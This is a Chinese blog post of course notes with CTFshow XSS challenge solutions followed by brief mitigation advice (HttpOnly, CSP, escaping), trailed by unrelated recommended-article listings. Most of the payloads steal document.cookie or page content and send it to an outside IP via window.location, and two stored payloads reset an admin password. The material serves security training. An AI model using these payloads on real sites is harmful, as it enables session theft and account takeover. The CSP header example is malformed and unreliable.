Day38 WEB 攻防-通用漏洞&XSS 跨站&绕过修复&http_only&CSP&标签符号

最新推荐文章于 2024-11-18 08:41:09 发布
最新推荐文章于 2024-11-18 08:41:09 发布
阅读量637 收藏 19
点赞数 9
文章标签: 前端 xss http
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73738451/article/details/137028485
版权

#知识点

1、XSS 跨站-过滤绕过-便签&语句&符号等

2、XSS 跨站-修复方案-CSP&函数&http_only 等

演示案例

Ø XSS 绕过-CTFSHOW-361 到 331 关卡绕过 WP

Ø XSS 修复-过滤函数&http_only&CSP&长度限制

#XSS 绕过-CTFSHOW-361 到 331 关卡绕过 WP

绕过:XSS总结 - 先知社区 (aliyun.com)

316-反射型-直接远程调用

<script>

    window.location.href='http://47.94.236.117/get.php?c='+document.cookie

</script>

317-反射型-过滤<script>

<img src=1 onerror=window.location.href='http://47.94.236.117/get.php?c='+document.cookie;>

318 319-反射型-过滤<img>

<input onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

<svg onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

320-326-反射型-过滤空格(用/代替空格)

<svg/onload="window.location.href='http://47.94.236.117/get.php?c='+document.cookie;">

327-存储型-无过滤

<script>

    window.location.href='http://47.94.236.117/get.php?c});='+document.cookie

</script>

328-存储型-注册插入 JS

<script>

    window.location.href='http://47.94.236.117/get.php?c='+document.cookie

</script>

  1. 存储型-失效凭据需 1 步完成所需操作

思路:session实时失效,通过js代码获取页面源码

<script>

    $('.laytable-cell-1-0-1').each(function(index,value)

    {if(value.innerHTML.indexOf('ctf'+'show')>-1)

    {window.location.href='http://47.94.236.117/get.php?c='+value.innerHTML; }

</script>

330-存储型-借助修改密码重置管理员密码(GET)

<script>

    window.location.href='http://127.0.0.1/api/change.php?p=123';

</script>

331-存储型-借助修改密码功能重置管理员密码(POST)

<script>

    $.ajax({

        url:'http://127.0.0.1/api/change.php',

        type:'post'

        ,data:{p:'123'}

    });

</script>

注意:优先选择无需触发的事件onload等方法

#XSS修复-过滤函数&htlp_only&CSP&长度限制

1、过滤一些危险字符,以及转义&<>"'等危险字符自定义过滤函数引用

2、HTTP.only Cookie

php如何设置httponly-PHP问题-PHP中文网

php.ini设置或代码引用

session.cookie_httponly=1

ini set("session.cookie_httponly",1);

3、设置CSP(Content securily Policy)

Header:("Content-Security-Policy img-src 'self’ ")

Web安全2.3:CSP安全策略、Cookie、Session、同源策略、HTML DOM树_csp meta report url html-CSDN博客

4、输入内容长度限制,实体转义等

李八八8864
关注
Web应用安全攻防
AI天才研究院
08-03 1197
随着互联网的普及和应用的日益扩张,网络应用越来越成为各行各业中普遍存在的现象。作为互联网世界的重要组成部分,网络安全在对抗各种攻击、防御方面发挥了越来越重要的作用。而对于网络应用的安全管理和维护,更是成为各类安全人员的必备技能。在互联网应用安全领域,许多著名的黑客组织、安全公司都提供了大量的学习资料、工具和课程。然而,为了更好地掌握这些知识、工具和方法,我们应该更加关注其背后的原理、算法和技术,为我们的工作提供一个系统的、全面的和有效的解决方案。
Penetration_Testing_POC-About 渗透测试有关的POC、EXP、脚本、提权、小工具等
weixin_46280935的博客
09-10 5682
Penetration_Testing_POC 搜集有关渗透测试中用到的POC、脚本、工具、文章等姿势分享,作为笔记吧,欢迎补充。 Penetration_Testing_POC 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone Web APP 提权辅助相关 PC tools-小工具集合 文章/书籍/教程相关 说明 请善用搜索[Ctrl+F]查找 IOT Device&Mobile Phone 翼创维awifi路由器存在多处未授权访问漏
小迪安全38WEB 攻防-通用漏洞&XSS 跨站&绕过修复&http_only&CSP&标签符号
weixin_73760178的博客
03-11 1029
直接写入js弹窗,发现直接爆了,一般的是需要通过获取Cookie等信息,构造链接让管理员点的,但属于这种刷题的,网站会自动配个机器人辅助点击,同时将此服务器作为本地,无需考虑跨站。如果我们将注册的账号密码改成JS代码,在管理员查看账号密码的时候会触发JS,从而发送到我们的本地文件,拿到cookie信息——实现跨站攻击。分析:此修改密码的功能并没有对账号进行验证,即只要是个用户,则访问该网址都会进行修改密码,那么当管理员访问了该网站,也会对密码进行修改。——即获得当前的页面源代码(一些靶场会屏蔽xss平台)
XSS跨站脚本攻击漏洞修复技巧
2401_84208172的博客
05-18 1626
跨站脚本攻击,又称XSS代码攻击,也是一种常见的脚本注入攻击。例如在下面的界面上,很多输入框是可以随意输入内容的,特别是一些文本编辑框里面,可以输入例如这样的内容,如果在一些首页出现很多这样内容,而又不经过处理,那么页面就不断的弹框,更有甚者,在里面执行一个无限循环的脚本函数,直到页面耗尽资源为止,类似这样的攻击都是很常见的,所以我们如果是在外网或者很有危险的网络上发布程序,一般都需要对这些问题进行修复
XSS跨站漏洞修复方案 彻底防止CSRF攻击
网站安全专家
09-06 1482
XSS跨站以及CSRF攻击,在目前的渗透测试,以及网站漏洞检测中 ,经常的被爆出有高危漏洞,我们SINE安全公司在对客户网站进行渗透测试时,也常有的发现客户网站以及APP存在以上的漏洞,其实CSRF以及XSS跨站很容易被发现以及利用,在收集客户网站域名,以及其他信息的时候,大体的注意一些请求操作,前端输入,get,post请求中,可否插入csrf代码,以及XSS代码。 很多客户的网站都有做一...
JAVA:URL存在跨站漏洞,注入漏洞解决方案
热门推荐
胡小晶的专栏
07-15 2万+
跨网站脚本介绍一 跨网站脚本跨网站脚本(Cross-site scripting,通常简称为XSS跨站脚本或跨站脚本攻击)是一种网站应用程序的安全漏洞攻击,是代码注入的一种。它允许恶意用户将代码注入到网页上,其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。 XSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击...
XSS跨站脚本)介绍及修复
OnlyRu丶小心心
08-04 1400
XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。XSS漏洞可以用来进行钓鱼攻击、前端js挖矿、用户cookie获取,甚至可以结合浏览器自身的漏洞对用户主机进行远程控制等。 形成XSS漏洞的主要原因是程序对输入和输出没有做合适的处理,导致“精心构造”的字符输出在前端时被浏览器当作有效代码解析执行从而产生危害。 因此在XSS漏洞的防范上,一般会采用“对输入进行过滤”和“输出进行转义”的
day38WEB攻防-通用漏洞&XSS跨站&绕过修复&http_only&CSP&标签符号
m0_69583059的博客
02-02 1332
本章知识点:1XSS跨站过滤绕过便签语句符号等2XSS跨站修复方案-CSP&函数&http_only等XSS绕过到331关卡绕过WP316-反射型直接远程调用window.location.href='' 表示指向跳转链接 document.cookie 表示获取cookie值317-反射型过滤318 319-反射型过滤320-326-反射型过滤空格327-存储型无过滤328-存储型注册插入JS。
day38 XSS跨站&绕过修复&http_only&CSP&标签符号
wanjia01的博客
11-22 653
document.cookie//获取当前浏览器cookie信息windows.location.her="xxxx.com'去访问目标网站GET.PHP?
田靖宇-day211
08-04
在实际的攻防演练中,XSS攻击的绕过方法多种多样,如双写绕过、事件触发结合、特殊字符转义等。例如,在DVWA靶场中,不同级别的XSS挑战展示了各种防御手段下的攻击对策,如使用`str_replace`进行替换,利用`onclick`...
白帽子讲浏览器安全.钱文祥(带详细书签).pdf
03-08
6.2.1 通用跨站脚本攻击 141 6.2.2 地址栏伪造 142 6.2.3 界面伪装 143 6.3 结合系统特性进行攻击 144 6.3.1 Android一例漏洞:使用Intent URL Scheme绕过Chrome SOP 144 6.3.2 iOS的一例漏洞:自动拨号泄露...
2023年网络安全岗面试跳槽看这一篇就够了(含面试题+大厂面经分享)
m0_71743066的博客
03-10 1602
又到了一年一度的金三银四面试季,想必有些朋友的心已经开始躁动了,毕竟跳槽涨薪的幅度远高于内部调薪的幅度!以下为网络安全各个方向涉及的面试题以及安全大厂的面经汇总,星数越多代表问题出现的几率越大,祝各位都能找到满意的工作。注:本套面试题及面经,已整理成pdf文档,但内容还在持续更新中,因为无论如何都不可能覆盖所有的面试问题,更多的还是希望由点达面,查漏补缺,希望对大家有帮助。
XSS安全漏洞的几种修复方式
markbug的博客
03-26 2万+
什么是XSS跨站脚本攻击(Cross Site Scripting),为不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS跨站脚本攻击指的是恶意攻击者往Web页面里插入恶意的html,javaScript代码,当用户浏览该页之时,嵌入其中Web里面的html,javaScript代码会被执行,从而达到恶意的特殊目的,如,盗取用户Cook
前端(1)——快速入门HTML
m0_63086198的博客
11-14 951
参考: W3school 1. HTML 我使用的是vs code,在使用之前,先安装以下几个插件: Auto Rename Tage HTML CSS Support Live Server 1.1 HTML标签 HTML全称是Hypertext Markup Language(超文本标记语言) HTML通过一系列的标签(也称为元素)来定义文本、图像、链接等等。HTML,标签是由尖括号包围的关键 字。 标签通常成对出现,包括开始标签和结束标签(也称为双标签),内容位于这两个标签之间,例如
w042基于web的IT技术交流和分享平台的设计与实现
最新发布
卓怡工作室的博客
11-18 721
我国科学技术的不断发展,计算机的应用日渐成熟,其强大的功能给人们留下深刻的印象,它已经应用到了人类社会的各个层次的领域,发挥着重要的不可替换的作用。信息管理作为计算机应用的一部分,使用计算机进行管理,具有非常明显的优点,利用网络的优势特开发了本基于SpringBoot的IT技术交流和分享平台。 本IT技术交流和分享平台是基于SpringBoot框架,采用Java技术,MYSQL数据库进行开发的。系统具有灵活的一体化设计方式,圆满完成了整个系统的界面设计。本系统实现了用户功能模块和管理员功能模块两大部分,
后端一次性返回数据,前端分页
qq_39307266的博客
11-14 395
vue 结合elementUI 分页组件,后端一次性返回数据,前端做分页。1.template中。js从后端获取总数据。
前端文件优化
weixin_62668406的博客
11-15 715
对于一张100*100像素的图片来说,图像上有 10000 个像素点,如果每个像素的值是 RGBA 存储的话,那么也就是说每个像素有 4 个通道,每个通道 1 个字节(8 位 = 1个字 节),所以该图⽚⼤⼩⼤概为 39KB(10000 * 1 * 4 / 1024)。但是在实际项⽬中,⼀张图⽚可能并不需要使⽤那么多颜⾊去显示,我们可以通过减少每个 像素的调⾊板来相应缩⼩图⽚的⼤⼩。
springboot整合websocket实现复制目录进度推送
前人栽树,后人乘凉。
11-14 414
/ 替换为你的WebSocket地址。启动Spring Boot应用程序,然后访问前端页面并触发文件复制操作。例如,通过浏览器访问。你应该能够在前端看到实时的复制进度。创建一个控制器来触发复制操作。
使用Web Components构建模块化Web应用
qq_36287830的博客
11-16 1085
允许开发者定义自己的 HTML 元素。Shadow DOM:提供了一种将 DOM 树与文档的其余部分隔离的方法,增强了封装性。:允许开发者定义可重复使用的 HTML 模板。(已废弃):允许开发者导入 HTML 文档中的 Web Components。自定义元素是 Web Components 的核心部分,允许开发者创建自己的 HTML 元素。自定义元素需要注册到全局的对象中。super();
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值